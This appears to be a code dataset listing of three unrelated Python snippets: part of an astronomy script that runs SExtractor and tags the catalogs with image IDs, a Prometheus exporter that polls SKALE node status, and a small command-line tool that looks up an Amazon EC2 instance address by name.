call = 'sextractor %s -c %s -CATALOG_NAME %s -CHECKIMAGE_NAME %s'
call += ' -WEIGHT_TYPE MAP_RMS -WEIGHT_IMAGE %s -MAG_ZEROPOINT %.2f'
call = call % (imgfiles[i], hst_config, catname, segname, rmsfiles[i], zeropoints.file_zp(imgfiles[i]))
print call
#creates acs_I_***_sci.gfxt (data) and acs_i_***_seg.fits (segmap)
os.system(call)
#open _sci.gfxt and add column with image number
sxt_out = ascii.read(catname)
# NOTE(review): hard-coded slice assumes a fixed-length img_path prefix --
# confirm it still extracts the intended image id if paths change.
imname = imgfiles[i][20:36]
# NOTE(review): newcol is built but never attached; the direct assignment on
# the next line is what actually adds the IMAGE_ID column.
newcol = Column(data = imname, name = 'IMAGE_ID')
sxt_out['IMAGE_ID'] = imname
ascii.write(sxt_out, catname, overwrite=True)
#Merge all files together
#Gain is good, zeropoint dones
#also change gain in default file or in call; this overwrites it
#then do te same for SDSS with changin gain and zeropint, runnint sextractor, putting into master image
|
#!/usr/bin/env python3
import time
import requests
import yaml
import sys
from prometheus_client import start_http_server, Summary, Enum
metrics = {}
def fetch(l):
    """Poll each node's /status/core endpoint and update the module-level
    Prometheus `metrics`.

    :param l: mapping of node name -> base URL.
    """
    for name, node in l.items():
        try:
            with metrics.get('skale_fetch_latency').labels(node=name).time():
                # BUG FIX: without a timeout the Timeout handler below could
                # never fire and one hung node would stall the whole poll loop.
                req = requests.get(node + "/status/core", timeout=10)
            res = req.json()
            for container in res.get('data'):
                metrics.get('skale_container_state').labels(container_name=container.get('name'), node=name, image=container.get('image')).state(container.get('state').get('Status'))
            if res.get('error') is None:
                metrics.get('skale_fetch_status').labels(node=name).state('OK')
            else:
                metrics.get('skale_fetch_status').labels(node=name).state('Error')
        except requests.exceptions.Timeout:
            metrics.get('skale_fetch_status').labels(node=name).state('Timeout')
        except requests.exceptions.TooManyRedirects:
            metrics.get('skale_fetch_status').labels(node=name).state('RedirectLoop')
        except requests.exceptions.RequestException as e:
            metrics.get('skale_fetch_status').labels(node=name).state('Exception')
        except Exception as e:
            # Catch-all so one bad node cannot kill the exporter loop.
            metrics.get('skale_fetch_status').labels(node=name).state('Other')
if __name__ == '__main__':
    # Load the YAML config given as the only CLI argument.
    # FIX: dropped the redundant close() inside the `with` block (the context
    # manager already closes the file) and stopped shadowing the builtin
    # `file` name.
    with open(sys.argv[1]) as config_file:
        config = yaml.load(config_file, Loader=yaml.FullLoader)
    # Start up the server to expose the metrics.
    start_http_server(config.get('port', 8000))
    metrics.update({'skale_container_state': Enum('skale_container_state', 'Container State',
        ['container_name', 'node', 'image'], states=['starting', 'running', 'stopped', 'error', 'restarting'])})
    metrics.update({'skale_fetch_status': Enum('skale_fetch_status', 'Metrics fetch status', ['node'], states=['OK', 'Error', 'Timeout', 'RedirectLoop', 'Exception', 'Other'])})
    metrics.update({'skale_fetch_latency': Summary('skale_fetch_latency', 'Time taken to fetch per node', ['node'])})
    # Poll every configured node forever at the configured interval.
    while True:
        fetch(config.get('nodes'))
        time.sleep(config.get('interval', 15))
|
#!/usr/bin/env python
"""
Utility for looking up the network address of an Amazon ec2 instance
"""
from argparse import ArgumentParser
from awsutils import lookup

if __name__ == '__main__':
    # Single positional argument: the instance's Name tag value.
    cli = ArgumentParser()
    cli.add_argument('name',
                     help='Value of the Name tag of an ec2 instance',)
    options = cli.parse_args()
    print(lookup(name=options.name))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.